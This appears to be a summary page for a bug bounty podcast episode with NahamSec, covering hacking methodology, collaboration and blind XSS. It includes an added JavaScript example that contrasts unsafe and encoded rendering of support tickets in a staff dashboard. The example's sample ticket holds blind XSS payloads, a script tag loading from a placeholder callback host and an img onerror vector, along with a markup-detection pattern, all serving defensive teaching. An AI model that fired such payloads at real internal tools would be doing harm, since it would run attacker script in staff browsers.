NahamSec, a bug bounty hunter and content creator, discusses his journey and challenges, including personal struggles and the pressure of success. Topics covered include finding balance, managing mental energy, planning and setting goals, Blind XSS techniques, and going the extra mile in bug bounty.
Being open to change and trying different approaches is crucial for success in hacking.
Thorough testing, pattern recognition, and collaboration enhance the vulnerability detection process.
Balancing thorough testing and efficiency is essential for effective hacking.
Collaboration with other hackers boosts the effectiveness of exploiting vulnerabilities and enhances hacking skills.
Deep dives
The Importance of Pivoting and Trying Different Approaches
The speaker emphasizes the significance of pivoting and trying different approaches in hacking. They share their personal experience of needing a change and wanting to explore new techniques. The speaker mentions how they transitioned from focusing on recon and web-oriented hacking to exploring vulnerabilities in desktop apps. They highlight the value of collaboration and how teaming up with other hackers, like Shmoo and Alex Chapman, helped them exploit vulnerabilities in desktop apps. The key takeaway is that being open to change and trying different approaches is crucial for success in hacking.
The Process of Testing and Recognizing Vulnerabilities
The speaker discusses their methodology in testing and recognizing vulnerabilities. They emphasize the importance of pattern recognition and identifying vulnerabilities specific to each target. The speaker explains how they apply thorough testing by using repeated payloads and analyzing the behavior of the application. They mention the significance of understanding various contexts, such as HTML injection and breaking out of existing limitations. The speaker also highlights the role of collaboration, seeking input from others, and learning from the community to enhance their testing process.
The Balance Between Thorough Testing and Efficiency
The speaker acknowledges the need to balance thorough testing and efficiency in hacking. They discuss how they spend time carefully testing fields, using both simple and polyglot payloads to break out of input fields. However, they also mention the importance of setting limits and recognizing when to move on from a specific target. The speaker's approach depends on their workload and the potential rewards of the program. They emphasize the significance of ROI (return on investment) and the patterns of mistakes specific to each company.
Recognizing the Value of Collaboration
The speaker highlights the value of collaboration in hacking. They share examples of collaborating with other hackers, like Shmoo and Alex Chapman, to exploit vulnerabilities in desktop apps. The speaker explains how collaborating can bring fresh perspectives, new ideas, and help boost the effectiveness of exploiting vulnerabilities. They encourage open collaboration, reaching out to fellow hackers for input and suggestions. The speaker also emphasizes the role of collaboration in the bug bounty community to collectively enhance hacking skills and knowledge.
Importance of Going the Extra Mile
Going the extra mile in a bug bounty program, such as setting up a premium account or providing additional verification, can yield significant benefits. It opens up more opportunities and rewards, helps build a closer relationship with the company, and allows for deeper testing and customization of the environment.
The Significance of Blind XSS
Blind XSS is a valuable vulnerability to target because the payload executes in a backend context, such as the internal tools that company staff use to review submitted data, rather than in the page the tester can see. This type of XSS requires thinking about where the payload will end up and how it will be triggered. By using a specialized payload and tracking whether and where it executes, hackers gain an advantage and can find blind XSS that ordinary, on-page testing misses.
The Impact of CSP and Customization
While a content security policy (CSP) can sometimes pose a challenge for blind XSS, it doesn't always block these attacks, and hackers can focus on other areas instead. Going the extra mile includes customizing your environment, setting up proper tracking for your payloads, and taking advantage of opportunities that arise beyond traditional XSS payloads.
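The two sections above describe where a blind XSS payload lands (an internal tool a company's staff use) and why CSP only sometimes gets in the way. The block below is an added illustration of that from the defender's side; it is not code from the podcast, from NahamSec, or from any project discussed. The support-ticket scenario, the sample submission, the field names, and the header values are all constructed assumptions for the example. It contrasts an admin view that concatenates stored fields into HTML with one that encodes them, adds a CSP for the internal tool as defence in depth, and flags submissions that carry markup so a security team can review them.

```javascript
// Added example (not from the podcast or from NahamSec): a constructed
// support-ticket flow showing where a blind XSS payload ends up (an internal
// staff dashboard, not the page the sender sees) and the controls that stop it.
// Ticket fields, header values and dashboard markup are assumptions made
// for this illustration.

// Constructed sample submission: both the message and the User-Agent are
// attacker-controlled and are only rendered later, to staff. The callback
// host is a deliberately invalid placeholder.
const SAMPLE_TICKET = {
  id: 1042,
  message: 'My invoice total is wrong <script src="https://callback.invalid/t.js"></script>',
  userAgent: 'Mozilla/5.0 "><img src=x onerror=alert(1)>',
};

// Minimal HTML entity encoding, safe for text nodes and double-quoted attributes.
function escapeHtml(value) {
  return String(value)
    .replace(/&/g, '&amp;')
    .replace(/</g, '&lt;')
    .replace(/>/g, '&gt;')
    .replace(/"/g, '&quot;')
    .replace(/'/g, '&#39;');
}

// The vulnerable pattern: the admin view concatenates stored fields straight
// into HTML, so whatever the customer submitted runs in a staff member's browser.
function renderTicketUnsafe(ticket) {
  return `<tr><td>${ticket.id}</td><td>${ticket.message}</td>` +
         `<td title="${ticket.userAgent}">${ticket.userAgent}</td></tr>`;
}

// The hardened pattern: every untrusted field is encoded before it reaches
// the template, whether it lands in a text node or an attribute value.
function renderTicketSafe(ticket) {
  const id = escapeHtml(ticket.id);
  const message = escapeHtml(ticket.message);
  const ua = escapeHtml(ticket.userAgent);
  return `<tr><td>${id}</td><td>${message}</td>` +
         `<td title="${ua}">${ua}</td></tr>`;
}

// Defence in depth for the internal tool: with a strict CSP, an injected
// external script or inline event handler does not execute even if one
// template forgets to encode. The exact policy is an assumption for this example.
function adminSecurityHeaders() {
  return {
    'Content-Security-Policy':
      "default-src 'self'; script-src 'self'; object-src 'none'; base-uri 'none'; frame-ancestors 'none'",
    'X-Content-Type-Options': 'nosniff',
  };
}

// Intake-side triage signal: flag string fields that contain tag openers,
// event-handler attributes or javascript: URLs so the security team can review
// them. This is a heuristic for detection, not a sanitiser; the encoding above
// is the actual control.
const MARKUP_PATTERN = /<\s*[a-z!\/]|on[a-z]+\s*=|javascript\s*:/i;

function flagSuspiciousFields(ticket) {
  return Object.entries(ticket)
    .filter(([, value]) => typeof value === 'string' && MARKUP_PATTERN.test(value))
    .map(([field]) => field);
}

// Stand-alone demonstration.
console.log('unsafe :', renderTicketUnsafe(SAMPLE_TICKET));
console.log('safe   :', renderTicketSafe(SAMPLE_TICKET));
console.log('flagged:', flagSuspiciousFields(SAMPLE_TICKET));
console.log('headers:', adminSecurityHeaders());
```

The point of running both renderers on the same ticket is that the submitted data never changes; only the rendering context decides whether it is text or code. The flagging helper is worth keeping separate from the encoder: it produces a log line a detection team can alert on, while the encoder and CSP are what actually prevent execution in the staff browser.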
Benefits of Premium Features and Setup
Investing in premium features and setting up your environment in a bug bounty program can provide numerous benefits. These can include better access, improved testing capabilities, more detailed reports, enhanced collaboration opportunities, and increased potential for rewards. Going above and beyond can yield positive outcomes in terms of both findings and relationships with the company.
Episode 53: In this episode of Critical Thinking - Bug Bounty Podcast, we're joined by none other than NahamSec. We start by discussing the challenges he faced on his journey in bug bounty hunting and content creation, including personal struggles and the pressure of success. We also talk about finding balance and managing mental energy, going the extra mile, and the importance of planning and setting goals for yourself, before he walks us through some Blind XSS techniques.
We also do Discord subs at $25, $10, $5 - premium subscribers get access to private masterclasses, exploits, tools, scripts, un-redacted bug reports, etc.
Timestamps:
(00:00:00) Introduction
(00:01:37) Costs of Content Creation
(00:21:12) Hacking 'identities' and Pivoting
(00:36:49) Hacking Methodology
(00:58:59) Planning, Goals, and NahamSec's 2023 Performance
(01:10:19) Blind XSS
(01:35:19) Going the extra mile in Bug Bounty